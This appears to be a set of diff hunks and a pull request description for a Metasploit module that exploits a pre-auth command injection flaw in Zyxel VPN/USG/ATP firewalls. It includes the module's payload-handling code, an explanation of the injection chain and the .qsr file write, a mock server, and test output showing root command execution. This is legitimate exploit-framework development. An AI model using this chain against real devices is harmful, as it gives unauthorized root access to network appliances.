+    unless cmd_injection_res && !cmd_injection_res.body.include?('ParseError: 0xC0DE0005')
+      fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful') 
+    end
   end
 end

--- a/modules/exploits/linux/http/zyxel_parse_config_rce.rb
+++ b/modules/exploits/linux/http/zyxel_parse_config_rce.rb
@@ -21,8 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Author' => [
           'SSD Secure Disclosure technical team', # discovery
-          'jheysel-r7',    # Msf module
-          'Jacob Baines',  # Testing
+          'jheysel-r7' # Msf module
         ],
         'References' => [
           [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution/'],
@@ -67,8 +66,8 @@ class MetasploitModule < Msf::Exploit::Remote
         product = product_match[1]
         version = version_match[1]
 
-        if (product.starts_with?('USG') && product.includes?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||
-           (product.starts_with?('USG') && !product.includes?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00')) ||
+        if (product.starts_with?('USG') && product.include?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||
+           (product.starts_with?('USG') && !product.include?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00')) ||
            (product.starts_with?('ATP') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||
            (product.starts_with?('VPN') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00'))
           return CheckCode::Appears("Product: #{product}, Version: #{version}")
@@ -94,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
       command_output = session.shell_command_token "ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success"
     end
 
-    if command_output.includes?('success')
+    if command_output.include?('success')
       print_good('The GRE interface was successfully removed.')
     else
       print_warning('The module failed to remove the GRE interface created by this exploit. Subsequent module runs will likely fail unless unless it\'s successfully removed')

--- a/modules/exploits/linux/http/zyxel_parse_config_rce.rb
+++ b/modules/exploits/linux/http/zyxel_parse_config_rce.rb
@@ -52,7 +52,6 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]),
-        OptBool.new('SHOW_CMD_OUTPUT', [true, 'When true the module will query the logs for the injected command\'s stdout', false])
       ]
     )
   end
@@ -156,8 +155,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => data.to_s
     })
 
-    # If the payload being used is for example cmd/unix/generic and not a payload spawning a reverse connection we can
-    # query the /ztp/cgi-bin/dumpztplog.py for the stdout of the command and print it for the user.
+    # If the payload being used is for example cmd/unix/generic and not a payload spawning any kind of handler (bind or reverse)
+    # we can query the /ztp/cgi-bin/dumpztplog.py for the stdout of the command and print it for the user.
     if payload_instance.connection_type == 'none'
       cmd_output_res = send_request_cgi({
         'method' => 'GET',

--- a/modules/exploits/linux/http/zyxel_parse_config_rce.rb
+++ b/modules/exploits/linux/http/zyxel_parse_config_rce.rb
@@ -151,7 +151,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     unless cmd_injection_res && !cmd_injection_res.body.include?('ParseError: 0xC0DE0005')
-      fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful') 
+      fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful')
     end
   end
 end

--- a/modules/exploits/linux/http/zyxel_parse_config_rce.rb
+++ b/modules/exploits/linux/http/zyxel_parse_config_rce.rb
@@ -112,6 +112,7 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_filepath = "#{datastore['WRITABLE_DIR']}/#{filename}.qsr"
 
     command = payload.raw
+    command += ' '
     command += <<~CMD
       2>/var/log/ztplog 1>/var/log/ztplog
       (sleep 10 && /bin/rm -rf #{payload_filepath}) &


### PR DESCRIPTION
This module is based off the work from the following [blog post](https://ssd-disclosure.com/ssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution/) which exploits multiple vulnerabilities in order to obtain pre-auth command injection the multiple VPN Series Zyxel devices. The exploit chain uses CVE-2023-33012 which is a command injection vulnerability which can be exploited when uploading a new configuration to `/ztp/cgi-bin/parse_config.py` by appending a command to the `option ipaddr ` field. 

The command injection is length limited to `0x14` bytes and is why this exploits chains a .qsr file write vulnerability as well in order to write the payload to a file which has no length limit and then call the payload with the command injection. 

The [advisory](https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-multiple-vulnerabilities-in-firewalls-and-wlan-controllers) states that USG series and others are also affected despite the blog post above being written specifically for the VPN series of devices. 


## Testing Attempt

I spun up a the following mock server in order to test the happy path of the PoC and to ensure the module interacted with the mock server in the same way the PoC did (the PoC can be found at the bottom of the [blog post](https://ssd-disclosure.com/ssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution/))

<details>

<summary>mock-server.py</summary>
<p>

```
from flask import Flask, request

app = Flask(__name__)

@app.route('/ext-js/app/common/zld_product_spec.js')
def fingerprint():
    response_text = """
    ZLDSYSPARM_PRODUCT_NAME1="VPN Gateway";
    ZLDCONFIG_CLOUD_HELP_VERSION=5.10;
    """
    return response_text, 200

@app.route('/')
def root():
    response_text = """
    <title>VPN Gateway</title>
    <link rel="stylesheet" href="/ext-js/app/common/zld_product_spec.js">
    """
    return response_text, 200

@app.route('/ztp/cgi-bin/parse_config.py', methods=['POST'])
def parse_config():
    response_text = "test"  # Changed response_text so it doesn't hit the invulnerable path
    return response_text, 200

@app.route('/ztp/cgi-bin/dumpztplog.py')
def dumpztplog():
    response_text = """
<html>
<head></head>
<body>
[IPC]IPC result: 1
uid=0(root) gid=0(root) groups=0(root)
</body>
</html>
"""
    return response_text, 200

if __name__ == '__main__':
    app.run(port=8080)  # Run the server on port 8080
```

</p>

</details>

<details>

<summary>PoC running against mock server:</summary>
<p>

```
➜  zyxel_vpn100  python3.10 poc.py 127.0.0.1 --no-https --port 8080 "id"
[+] fingerprint
    title   = VPN Gateway
    version = 5.10
[+] payload transfer
    complete
[+] code execution
    complete
[+] receive output

uid=0(root) gid=0(root) groups=0(root)
````

</p>

</details>



<details>

<summary>Module running against mock server:</summary>
<p>

```
msf6 exploit(linux/http/zyxel_parse_config_rce) > set payload cmd/unix/generic
payload => cmd/unix/generic
msf6 exploit(linux/http/zyxel_parse_config_rce) > set cmd id
cmd => id
msf6 exploit(linux/http/zyxel_parse_config_rce) > set AllowNoCleanup true
AllowNoCleanup => true
msf6 exploit(linux/http/zyxel_parse_config_rce) > run

[*] Attempting to upload the payload via QSR file write...
[+] File write was successful.
[+] Command output:
uid=0(root) gid=0(root) groups=0(root)

[!] This exploit may require manual cleanup of '/tmp/N.qsr' on the target
[*] Exploit completed, but no session was created.
```

</p>

</details>

## Emulation Attempt
I had attempted to emulated the firmware by first decrypting it using the known method. More info [here](https://www.youtube.com/watch?v=_nSlc8Y40_I)

I downloaded the following from this [link](https://people.debian.org/~jcowgill/qemu-mips/):
- debian-buster-mips.qcow2
- initrd.img-4.14.0-3-5kc-malta.mips.buster
- vmlinux-4.14.0-3-5kc-malta.mips.buster  

And was able to spin up a mips environment like so:

I wasn't able find a networking configuration that allowed me to connect to my host and the internet at the same so I shut down the instance and rebooted depending on what I needed to connect to. After I transferred the decrypted firmware from my host to the device, I switched to the internet connected configuration so I could install tools to try and debug/ figure out why my chroot attempts weren't working. 

<details>
<summary>start-debian-mips-connected-to-internet.sh</summary>
<p>

```
  qemu-system-mips64 \
    -M malta \
    -cpu MIPS64R2-generic \
    -m 2G \
    -append 'root=/dev/vda console=ttyS0 mem=2048m net.ifnames=0 nokaslr' \
    -netdev user,id=mynet0 \
    -device virtio-net,netdev=mynet0 \
    -device usb-kbd \
    -device usb-tablet \
    -kernel vmlinux-4.14.0-3-5kc-malta.mips.buster \
    -initrd initrd.img-4.14.0-3-5kc-malta.mips.buster \
    -drive file=debian-buster-mips.qcow2,if=virtio \
    -nographic
```

</p>

</details>

<details>
<summary>start-debian-mips-connected-to-host.sh</summary>
<p>

```
#set network - enables qemu vm to communicate with host but not the internet
sudo brctl addbr virbr0
sudo ifconfig virbr0 192.168.5.1/24 up
sudo tunctl -t tap0
sudo ifconfig tap0 192.168.5.11/24 up
sudo brctl addif virbr0 tap0
  qemu-system-mips64 \
    -M malta \
    -cpu MIPS64R2-generic \
    -m 2G \
    -append 'root=/dev/vda console=ttyS0 mem=2048m net.ifnames=0 nokaslr' \
    -netdev tap,id=tapnet,ifname=tap0,script=no \
    -device rtl8139,netdev=tapnet \
    -device usb-kbd \
    -device usb-tablet \
    -kernel vmlinux-4.14.0-3-5kc-malta.mips.buster \
    -initrd initrd.img-4.14.0-3-5kc-malta.mips.buster \
    -drive file=debian-buster-mips.qcow2,if=virtio \
    -nographic
```

</p>

</details>

Once the mips instance was running and I had mounted the squashfs file system of the firmware onto the mips device my plan was to run `chroot ./squashfs-root/ /bin/sh` to get a shell running in the context of the vulnerable firmware and then from there start the apache server that hosts the vulnerable endpoint, however I was seeing the following error when running as root:
```
chroot: failed to run command '/bin/sh': Permission denied
```


